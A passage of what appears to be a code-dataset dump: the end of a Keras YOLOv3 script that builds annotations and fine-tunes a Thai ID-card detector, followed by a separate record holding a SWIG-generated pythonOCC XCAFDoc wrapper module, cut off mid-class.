    if load_pretrained:
        model_body.load_weights(weights_path, by_name=True, skip_mismatch=True)
        print('Load weights {}.'.format(weights_path))
        if freeze_body in [1, 2]:
            # Freeze the darknet body or freeze all but 2 output layers.
            num = (20, len(model_body.layers)-2)[freeze_body-1]
            for i in range(num): model_body.layers[i].trainable = False
            print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))

    model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
        arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.7})(
        [*model_body.output, *y_true])
    model = Model([model_body.input, *y_true], model_loss)

    return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
    '''data generator for fit_generator

    Infinite generator; reshuffles the annotation list at the start of
    every pass over the dataset.
    '''
    n = len(annotation_lines)
    i = 0
    while True:
        image_data = []
        box_data = []
        for b in range(batch_size):
            if i==0:
                np.random.shuffle(annotation_lines)
            # Augmented image + boxes for one annotation line.
            image, box = get_random_data(annotation_lines[i], input_shape, random=True)
            image_data.append(image)
            box_data.append(box)
            i = (i+1) % n
        image_data = np.array(image_data)
        box_data = np.array(box_data)
        y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
        # Dummy zeros target: the real loss is produced inside the model's
        # yolo_loss layer, so Keras only needs a placeholder y.
        yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrapper(annotation_lines, batch_size, input_shape, anchors, num_classes):
    """Guarded front-end for data_generator: None for degenerate input."""
    if len(annotation_lines) == 0 or batch_size <= 0:
        return None
    return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
class yolo_det(object):
    """Pipeline wrapper: build an annotation file from the index dump, then
    fine-tune YOLOv3 for Thai ID-card detection."""
    def __init__(self,
                 all_file_path='/data/shuai_li/Thai-OCR-Dev/Models/all_index/all_file.npy',
                 ):
        # NOTE(review): loading an .npy of strings may require
        # allow_pickle=True on NumPy >= 1.16.3 — confirm the file format.
        self.all_file = np.load(all_file_path)
        # Manually blacklisted images whose annotations are known-bad.
        self.bad_cases = [
            '/data/TH_ID/yezi_image/fd87e860dd6406b83a6306def091330e07000000000f892600000000020200a4.jpeg',
            '/data/TH_ID/yezi_image/ab100cd6a06a1925089d0a726e2886280700000000225b2600000000020200e1.jpeg',
            '/data/TH_ID/yezi_image/beb05d687a56ed4d3fb6d42347c003070700000000265c290000000002020035.jpeg',
            '/data/TH_ID/yezi_image/bea43cfb264711b81fe0f49a358294e2070000000023857200000000020200bd.jpeg',
            '/data/TH_ID/yezi_image/bcc900f84ed38e831cef76fc2bec6af707000000002631360000000002020033.jpeg',
            '/data/TH_ID/yezi_image/beda194099d0e3a5265b8c98406f21600700000000456bd500000000020200e2.jpeg',
            '/data/TH_ID/yezi_image/c27e1f836801414b07def809c78de13307000000003a1db2000000000202004a.jpeg',
            '/data/TH_ID/yezi_image/be89e4e6ccfbce649201f60d40a1515007000000001e47a000000000020200f5.jpeg',
            '/data/TH_ID/yezi_image/c6000ce57f232eacba3553a0dec2aacd0700000000663c3400000000020200b4.jpeg',
            '/data/TH_ID/yezi_image/909fe765a7e5f00e0e9d26e386cb54ae07000000003da7660000000002020000.jpeg',
            '/data/TH_ID/yezi_image/b549617924ae64a20bb5eb67bc2327050700000000371a460000000002020060.jpeg',
            '/data/TH_ID/yezi_image/0634f63236f44d9304b077e83a2bc27307000000004794dc0000000002020042.jpeg',
            '/data/TH_ID/yezi_image/c5c146e1bfc0c9b32f3aa8976cf29b5107000000000e55260000000002020089.jpeg',
            '/data/TH_ID/yezi_image/d5c81669ec7b814eb251a1404581742607000000003e908300000000020200af.jpeg',
            '/data/TH_ID/yezi_image/beefe0586919c7aa03ac76cc3ed94a2607000000005305e800000000020200f8.jpeg',
            '/data/TH_ID/yezi_image/bc1bbb89472d3b380558159c87431f7507000000002498e900000000020200ff.jpeg',
            '/data/TH_ID/yezi_image/c7ec8fec506ff0386c6e598542f5aaef070000000042aae900000000020200be.jpeg',
            '/data/TH_ID/yezi_image/1995c377464e5e5df62f372487ac125c0700000000271f3c00000000020200b4.jpeg',
            '/data/TH_ID/yezi_image/8a0ce2aee94518bbe6360c6db5b1e8f607000000004f673b0000000002020051.jpeg',
            '/data/TH_ID/yezi_image/e6918b940c1b9c2ebdd1dfee0a885aad07000000002e62cb000000000202004e.jpeg',
            '/data/TH_ID/yezi_image/be7292a0ac02dafda11a32189297a2b10700000000420a3c00000000020200a8.jpeg',
            '/data/TH_ID/yezi_image/a440e562e074be208ee853f4b0d53f7f070000000028ed770000000002020013.jpeg',
        ]
        self.anno_path=self.process()

    def process(self):
        """Write 'img_path xmin,ymin,xmax,ymax,0' annotation lines.

        Cached: reuses model_data/annotations.txt when it already exists.
        """
        if os.path.exists('model_data/annotations.txt'):
            return 'model_data/annotations.txt'
        # 'with' guarantees the annotation file is closed/flushed even if a
        # malformed line raises mid-loop (the original left it open then).
        with open('model_data/annotations.txt','w',encoding='utf-8') as f:
            for line in self.all_file:
                img_path = line.split('\t')[0]
                if img_path.split('/')[2]!='TH_ID':continue
                if img_path in self.bad_cases:continue
                # Bug fix: np.int was deprecated in NumPy 1.20 and removed
                # in 1.24 (AttributeError); the builtin int is equivalent.
                coords = np.array(line.split('\t')[-1].strip('\n').strip('\t').split(' '),dtype=int).reshape((-1,2))
                # Axis-aligned bounding box over the first four corner points.
                xmin,ymin,xmax,ymax=np.min(coords[:4,0]),np.min(coords[:4,1]),np.max(coords[:4,0]),np.max(coords[:4,1])
                f.write('{} {},{},{},{},{}\n'.format(
                    img_path,xmin,ymin,xmax,ymax,0
                ))
        return 'model_data/annotations.txt'

    def train_yolov3(self):
        """Fine-tune in two stages; stage 2 unfreezes the full network."""
        classes_path = 'model_data/classes.txt'
        anchors_path = 'model_data/yolo_anchors.txt'
        class_names = get_classes(classes_path)
        num_classes = len(class_names)
        anchors = get_anchors(anchors_path)

        input_shape = (416,416) # multiple of 32, hw

        is_tiny_version = len(anchors)==6 # default setting
        if is_tiny_version:
            model = create_tiny_model(input_shape, anchors, num_classes,
                freeze_body=2, weights_path='model_data/yolov3_trained_for_th_card_detection.h5')
        else:
            model = create_model(input_shape, anchors, num_classes,
                freeze_body=2, weights_path='model_data/yolov3_trained_for_th_card_detection.h5') # make sure you know what you freeze

        logging = TensorBoard(log_dir='logs')
        checkpoint = ModelCheckpoint('model_data/yolov3_trained_for_th_card_detection.h5',
            monitor='val_loss', save_weights_only=False, save_best_only=True, period=1,
            verbose=1)
        reduce_lr = ReduceLROnPlateau(monitor='val_loss', factor=0.1, patience=5, verbose=1)
        early_stopping = EarlyStopping(monitor='val_loss', min_delta=0, patience=20, verbose=1)

        # Reuse a previously saved split so resumed runs see identical data.
        val_split = 0.1
        if os.path.exists('model_data/train.npy') and os.path.exists('model_data/val.npy'):
            train_data=np.load('model_data/train.npy')
            val_data=np.load('model_data/val.npy')
        else:
            with open(self.anno_path) as f:
                lines = f.readlines()
            np.random.seed(10101)
            np.random.shuffle(lines)
            np.random.seed(None)
            num_val = int(len(lines)*val_split)
            num_train = len(lines) - num_val
            train_data=np.array(lines[:num_train])
            val_data=np.array(lines[num_train:])
            np.save('model_data/train.npy',train_data)
            np.save('model_data/val.npy',val_data)

        model.compile(optimizer=Adam(lr=1e-3), loss={
            # use custom yolo_loss Lambda layer.
            'yolo_loss': lambda y_true, y_pred: y_pred})
        batch_size = 32
        print('Stage 1: Train on {} samples, val on {} samples, with batch size {}.'.format(len(train_data), len(val_data), batch_size))
        model.fit_generator(data_generator_wrapper(train_data, batch_size, input_shape, anchors, num_classes),
                steps_per_epoch=max(1, len(train_data)//batch_size),
                validation_data=data_generator_wrapper(val_data, batch_size, input_shape, anchors, num_classes),
                validation_steps=max(1, len(val_data)//batch_size),
                epochs=50,
                initial_epoch=0,
                callbacks=[logging, checkpoint,reduce_lr,early_stopping])

        # Stage 2: unfreeze everything and recompile with a lower LR.
        for i in range(len(model.layers)):
            model.layers[i].trainable = True
        model.compile(optimizer=Adam(lr=1e-4), loss={'yolo_loss': lambda y_true, y_pred: y_pred}) # recompile to apply the change
        batch_size = 32 # note that more GPU memory is required after unfreezing the body
        print('Stage 2: Train on {} samples, val on {} samples, with batch size {}.'.format(len(train_data), len(val_data), batch_size))
        model.fit_generator(data_generator_wrapper(train_data, batch_size, input_shape, anchors, num_classes),
            steps_per_epoch=max(1, len(train_data)//batch_size),
            validation_data=data_generator_wrapper(val_data, batch_size, input_shape, anchors, num_classes),
            validation_steps=max(1, len(val_data)//batch_size),
            epochs=300,
            initial_epoch=0,
            callbacks=[logging, checkpoint, reduce_lr, early_stopping])
if __name__ == '__main__':
    # Build annotations (in __init__) and run the two-stage training.
    app=yolo_det()
    app.train_yolov3()
|
23,528 | 901223996067e5b12ddde11c620751e87d0f82da | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
# SWIG-generated loader boilerplate: locate and import the compiled
# _XCAFDoc extension module. Do not hand-edit the logic.
if version_info >= (3,0,0):
    new_instancemethod = lambda func, inst, cls: _XCAFDoc.SWIG_PyInstanceMethod_New(func)
else:
    from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
    def swig_import_helper():
        # Find the shared library next to this wrapper module first.
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_XCAFDoc', [dirname(__file__)])
        except ImportError:
            # Fall back to a normal sys.path import.
            import _XCAFDoc
            return _XCAFDoc
        if fp is not None:
            try:
                _mod = imp.load_module('_XCAFDoc', fp, pathname, description)
            finally:
                fp.close()
            return _mod
    _XCAFDoc = swig_import_helper()
    del swig_import_helper
else:
    import _XCAFDoc
del version_info
try:
    _swig_property = property
except NameError:
    pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
    # SWIG boilerplate: route attribute writes through SWIG-declared
    # setters; with static=1, reject attributes the C++ class lacks.
    if (name == "thisown"): return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name,None)
    if method: return method(self,value)
    if (not static):
        self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
    # Dynamic variant: unknown attributes are allowed (static=0).
    return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
    # SWIG boilerplate: read attributes via SWIG-declared getters.
    if (name == "thisown"): return self.this.own()
    method = class_type.__swig_getmethods__.get(name,None)
    if method: return method(self)
    raise AttributeError(name)
def _swig_repr(self):
    # Repr of the underlying C++ proxy; falls back to empty when no
    # 'this' pointer is attached yet.
    try: strthis = "proxy of " + self.this.__repr__()
    except: strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# Old/new-style class compatibility shim (pre-Python-2.2 fallback).
try:
    _object = object
    _newclass = 1
except AttributeError:
    class _object : pass
    _newclass = 0
def _swig_setattr_nondynamic_method(set):
    """Wrap *set* into a __setattr__ that refuses to create new attributes.

    The returned function forwards to *set* for 'this' and for any attribute
    that already exists ('thisown' goes straight to the SwigPyObject);
    attempts to invent new attributes raise AttributeError.
    """
    def set_attr(self, name, value):
        if name == "thisown":
            return self.this.own(value)
        if name == "this" or hasattr(self, name):
            set(self, name, value)
        else:
            raise AttributeError("You cannot add attributes to %s" % self)
    return set_attr
class SwigPyIterator(object):
    """Abstract base for SWIG's C++ container iterators.

    Instances are only produced by the wrapped library; direct construction
    is deliberately disabled.
    """
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
    __repr__ = _swig_repr
    __swig_destroy__ = _XCAFDoc.delete_SwigPyIterator
    def __iter__(self): return self
# Attach the C-level iterator operations as bound methods of the proxy class.
SwigPyIterator.value = new_instancemethod(_XCAFDoc.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_XCAFDoc.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_XCAFDoc.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_XCAFDoc.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_XCAFDoc.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_XCAFDoc.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_XCAFDoc.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_XCAFDoc.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_XCAFDoc.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_XCAFDoc.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_XCAFDoc.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_XCAFDoc.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_XCAFDoc.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_XCAFDoc.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_XCAFDoc.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_XCAFDoc.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _XCAFDoc.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
# Sibling OCC wrapper modules this module's proxy classes inherit from / use.
import OCC.Standard
import OCC.TDF
import OCC.TCollection
import OCC.MMgt
import OCC.TColStd
import OCC.gp
import OCC.Quantity
import OCC.TopoDS
import OCC.TopLoc
import OCC.TopAbs
import OCC.TDocStd
import OCC.Resource
import OCC.TopTools
import OCC.Message
# XCAFDoc_ColorType enumeration values: generic, surface and curve colors.
XCAFDoc_ColorGen = _XCAFDoc.XCAFDoc_ColorGen
XCAFDoc_ColorSurf = _XCAFDoc.XCAFDoc_ColorSurf
XCAFDoc_ColorCurv = _XCAFDoc.XCAFDoc_ColorCurv
class xcafdoc(object):
    """Namespace-style proxy exposing the standard XCAFDoc GUID accessors.

    Each accessor is generated twice by SWIG: as a staticmethod here and as
    a free module-level function of the same name prefixed 'xcafdoc_'.
    """
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def AssemblyGUID(*args):
        """
        * Returns GUID for UAttribute identifying assembly
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_AssemblyGUID(*args)
    AssemblyGUID = staticmethod(AssemblyGUID)
    def ShapeRefGUID(*args):
        """
        * Returns GUID for TreeNode representing assembly link
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_ShapeRefGUID(*args)
    ShapeRefGUID = staticmethod(ShapeRefGUID)
    def ColorRefGUID(*args):
        """
        * Return GUIDs for TreeNode representing specified types of colors
        :param type:
        :type type: XCAFDoc_ColorType
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_ColorRefGUID(*args)
    ColorRefGUID = staticmethod(ColorRefGUID)
    def DimTolRefGUID(*args):
        """
        * Return GUIDs for TreeNode representing specified types of DGT
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_DimTolRefGUID(*args)
    DimTolRefGUID = staticmethod(DimTolRefGUID)
    def DatumRefGUID(*args):
        """
        * Return GUIDs for TreeNode representing specified types of datum
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_DatumRefGUID(*args)
    DatumRefGUID = staticmethod(DatumRefGUID)
    def DatumTolRefGUID(*args):
        """
        * Return GUIDs for TreeNode representing connections Datum-Toler
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_DatumTolRefGUID(*args)
    DatumTolRefGUID = staticmethod(DatumTolRefGUID)
    def LayerRefGUID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_LayerRefGUID(*args)
    LayerRefGUID = staticmethod(LayerRefGUID)
    def MaterialRefGUID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_MaterialRefGUID(*args)
    MaterialRefGUID = staticmethod(MaterialRefGUID)
    def InvisibleGUID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_InvisibleGUID(*args)
    InvisibleGUID = staticmethod(InvisibleGUID)
    def ExternRefGUID(*args):
        """
        * Returns GUID for UAttribute identifying external reference on no-step file
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_ExternRefGUID(*args)
    ExternRefGUID = staticmethod(ExternRefGUID)
    def SHUORefGUID(*args):
        """
        * Returns GUID for UAttribute identifying specified higher usage occurrence
        :rtype: Standard_GUID
        """
        return _XCAFDoc.xcafdoc_SHUORefGUID(*args)
    SHUORefGUID = staticmethod(SHUORefGUID)
    def __init__(self):
        _XCAFDoc.xcafdoc_swiginit(self,_XCAFDoc.new_xcafdoc())
    def __del__(self):
        # NOTE(review): 'GarbageCollector' is not imported in this module --
        # presumably installed by the OCC runtime; verify before relying on it.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
xcafdoc._kill_pointed = new_instancemethod(_XCAFDoc.xcafdoc__kill_pointed,None,xcafdoc)
xcafdoc_swigregister = _XCAFDoc.xcafdoc_swigregister
xcafdoc_swigregister(xcafdoc)
# Free-function duplicates of the xcafdoc staticmethods above, emitted by
# SWIG so the GUID accessors can also be called without the class.
def xcafdoc_AssemblyGUID(*args):
    """
    * Returns GUID for UAttribute identifying assembly
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_AssemblyGUID(*args)
def xcafdoc_ShapeRefGUID(*args):
    """
    * Returns GUID for TreeNode representing assembly link
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_ShapeRefGUID(*args)
def xcafdoc_ColorRefGUID(*args):
    """
    * Return GUIDs for TreeNode representing specified types of colors
    :param type:
    :type type: XCAFDoc_ColorType
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_ColorRefGUID(*args)
def xcafdoc_DimTolRefGUID(*args):
    """
    * Return GUIDs for TreeNode representing specified types of DGT
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_DimTolRefGUID(*args)
def xcafdoc_DatumRefGUID(*args):
    """
    * Return GUIDs for TreeNode representing specified types of datum
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_DatumRefGUID(*args)
def xcafdoc_DatumTolRefGUID(*args):
    """
    * Return GUIDs for TreeNode representing connections Datum-Toler
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_DatumTolRefGUID(*args)
def xcafdoc_LayerRefGUID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_LayerRefGUID(*args)
def xcafdoc_MaterialRefGUID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_MaterialRefGUID(*args)
def xcafdoc_InvisibleGUID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_InvisibleGUID(*args)
def xcafdoc_ExternRefGUID(*args):
    """
    * Returns GUID for UAttribute identifying external reference on no-step file
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_ExternRefGUID(*args)
def xcafdoc_SHUORefGUID(*args):
    """
    * Returns GUID for UAttribute identifying specified higher usage occurrence
    :rtype: Standard_GUID
    """
    return _XCAFDoc.xcafdoc_SHUORefGUID(*args)
class XCAFDoc_Area(OCC.TDF.TDF_Attribute):
    """TDF attribute storing an area (real value) on a label."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        * class methods =============
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Area_swiginit(self,_XCAFDoc.new_XCAFDoc_Area(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Area_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(*args):
        """
        * Sets a value of volume
        :param vol:
        :type vol: float
        :rtype: None
        * Find, or create, an Area attribute and set its value
        :param label:
        :type label: TDF_Label &
        :param area:
        :type area: float
        :rtype: Handle_XCAFDoc_Area
        """
        return _XCAFDoc.XCAFDoc_Area_Set(*args)
    Set = staticmethod(Set)
    def Get(*args):
        """
        :rtype: float
        * Returns volume of area as argument and succes status returns false if no such attribute at the <label>
        :param label:
        :type label: TDF_Label &
        :param area:
        :type area: float &
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_Area_Get(*args)
    Get = staticmethod(Get)
    def DumpToString(self):
        """DumpToString(XCAFDoc_Area self) -> std::string"""
        return _XCAFDoc.XCAFDoc_Area_DumpToString(self)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Area self)"""
        return _XCAFDoc.XCAFDoc_Area__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Area self) -> Handle_XCAFDoc_Area"""
        return _XCAFDoc.XCAFDoc_Area_GetHandle(self)
    def __del__(self):
        # NOTE(review): 'GarbageCollector' is not imported here -- presumably
        # provided by the OCC runtime; the bare except hides that if not.
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
XCAFDoc_Area.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Area_DumpToString,None,XCAFDoc_Area)
XCAFDoc_Area._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Area__kill_pointed,None,XCAFDoc_Area)
XCAFDoc_Area.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Area_GetHandle,None,XCAFDoc_Area)
XCAFDoc_Area_swigregister = _XCAFDoc.XCAFDoc_Area_swigregister
XCAFDoc_Area_swigregister(XCAFDoc_Area)
# Free-function duplicates of the XCAFDoc_Area staticmethods.
def XCAFDoc_Area_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_Area_GetID(*args)
def XCAFDoc_Area_Set(*args):
    """
    * Sets a value of volume
    :param vol:
    :type vol: float
    :rtype: None
    * Find, or create, an Area attribute and set its value
    :param label:
    :type label: TDF_Label &
    :param area:
    :type area: float
    :rtype: Handle_XCAFDoc_Area
    """
    return _XCAFDoc.XCAFDoc_Area_Set(*args)
def XCAFDoc_Area_Get(*args):
    """
    :rtype: float
    * Returns volume of area as argument and succes status returns false if no such attribute at the <label>
    :param label:
    :type label: TDF_Label &
    :param area:
    :type area: float &
    :rtype: bool
    """
    return _XCAFDoc.XCAFDoc_Area_Get(*args)
class Handle_XCAFDoc_Area(OCC.TDF.Handle_TDF_Attribute):
    """Smart-pointer (handle) proxy for XCAFDoc_Area."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_Area_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Area(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Area_DownCast)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
Handle_XCAFDoc_Area.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_Nullify,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_IsNull,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area_GetObject,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Area__kill_pointed,None,Handle_XCAFDoc_Area)
Handle_XCAFDoc_Area_swigregister = _XCAFDoc.Handle_XCAFDoc_Area_swigregister
Handle_XCAFDoc_Area_swigregister(Handle_XCAFDoc_Area)
def Handle_XCAFDoc_Area_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_Area_DownCast(*args)
Handle_XCAFDoc_Area_DownCast = _XCAFDoc.Handle_XCAFDoc_Area_DownCast
class XCAFDoc_Centroid(OCC.TDF.TDF_Attribute):
    """TDF attribute storing a centroid point (gp_Pnt) on a label."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        * class methods =============
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Centroid_swiginit(self,_XCAFDoc.new_XCAFDoc_Centroid(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
        return _XCAFDoc.XCAFDoc_Centroid_GetID(*args)
    GetID = staticmethod(GetID)
    def Set(self, *args):
        """
        * Find, or create, a Location attribute and set it's value the Location attribute is returned. Location methods ===============
        :param label:
        :type label: TDF_Label &
        :param pnt:
        :type pnt: gp_Pnt
        :rtype: Handle_XCAFDoc_Centroid
        :param pnt:
        :type pnt: gp_Pnt
        :rtype: None
        """
        return _XCAFDoc.XCAFDoc_Centroid_Set(self, *args)
    def Get(*args):
        """
        :rtype: gp_Pnt
        * Returns point as argument returns false if no such attribute at the <label>
        :param label:
        :type label: TDF_Label &
        :param pnt:
        :type pnt: gp_Pnt
        :rtype: bool
        """
        return _XCAFDoc.XCAFDoc_Centroid_Get(*args)
    Get = staticmethod(Get)
    def DumpToString(self):
        """DumpToString(XCAFDoc_Centroid self) -> std::string"""
        return _XCAFDoc.XCAFDoc_Centroid_DumpToString(self)
    def _kill_pointed(self):
        """_kill_pointed(XCAFDoc_Centroid self)"""
        return _XCAFDoc.XCAFDoc_Centroid__kill_pointed(self)
    def GetHandle(self):
        """GetHandle(XCAFDoc_Centroid self) -> Handle_XCAFDoc_Centroid"""
        return _XCAFDoc.XCAFDoc_Centroid_GetHandle(self)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
XCAFDoc_Centroid.Set = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_Set,None,XCAFDoc_Centroid)
XCAFDoc_Centroid.DumpToString = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_DumpToString,None,XCAFDoc_Centroid)
XCAFDoc_Centroid._kill_pointed = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid__kill_pointed,None,XCAFDoc_Centroid)
XCAFDoc_Centroid.GetHandle = new_instancemethod(_XCAFDoc.XCAFDoc_Centroid_GetHandle,None,XCAFDoc_Centroid)
XCAFDoc_Centroid_swigregister = _XCAFDoc.XCAFDoc_Centroid_swigregister
XCAFDoc_Centroid_swigregister(XCAFDoc_Centroid)
# Free-function duplicates of the XCAFDoc_Centroid staticmethods.
def XCAFDoc_Centroid_GetID(*args):
    """
    :rtype: Standard_GUID
    """
    return _XCAFDoc.XCAFDoc_Centroid_GetID(*args)
def XCAFDoc_Centroid_Get(*args):
    """
    :rtype: gp_Pnt
    * Returns point as argument returns false if no such attribute at the <label>
    :param label:
    :type label: TDF_Label &
    :param pnt:
    :type pnt: gp_Pnt
    :rtype: bool
    """
    return _XCAFDoc.XCAFDoc_Centroid_Get(*args)
class Handle_XCAFDoc_Centroid(OCC.TDF.Handle_TDF_Attribute):
    """Smart-pointer (handle) proxy for XCAFDoc_Centroid."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        _XCAFDoc.Handle_XCAFDoc_Centroid_swiginit(self,_XCAFDoc.new_Handle_XCAFDoc_Centroid(*args))
    DownCast = staticmethod(_XCAFDoc.Handle_XCAFDoc_Centroid_DownCast)
    def __del__(self):
        try:
            self.thisown = False
            GarbageCollector.garbage.collect_object(self)
        except:
            pass
Handle_XCAFDoc_Centroid.Nullify = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_Nullify,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid.IsNull = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_IsNull,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid.GetObject = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid_GetObject,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid._kill_pointed = new_instancemethod(_XCAFDoc.Handle_XCAFDoc_Centroid__kill_pointed,None,Handle_XCAFDoc_Centroid)
Handle_XCAFDoc_Centroid_swigregister = _XCAFDoc.Handle_XCAFDoc_Centroid_swigregister
Handle_XCAFDoc_Centroid_swigregister(Handle_XCAFDoc_Centroid)
def Handle_XCAFDoc_Centroid_DownCast(*args):
    return _XCAFDoc.Handle_XCAFDoc_Centroid_DownCast(*args)
Handle_XCAFDoc_Centroid_DownCast = _XCAFDoc.Handle_XCAFDoc_Centroid_DownCast
class XCAFDoc_Color(OCC.TDF.TDF_Attribute):
    """TDF attribute storing a color (Quantity_Color / RGB) on a label."""
    thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
    __repr__ = _swig_repr
    def __init__(self, *args):
        """
        :rtype: None
        """
        _XCAFDoc.XCAFDoc_Color_swiginit(self,_XCAFDoc.new_XCAFDoc_Color(*args))
    def GetID(*args):
        """
        :rtype: Standard_GUID
        """
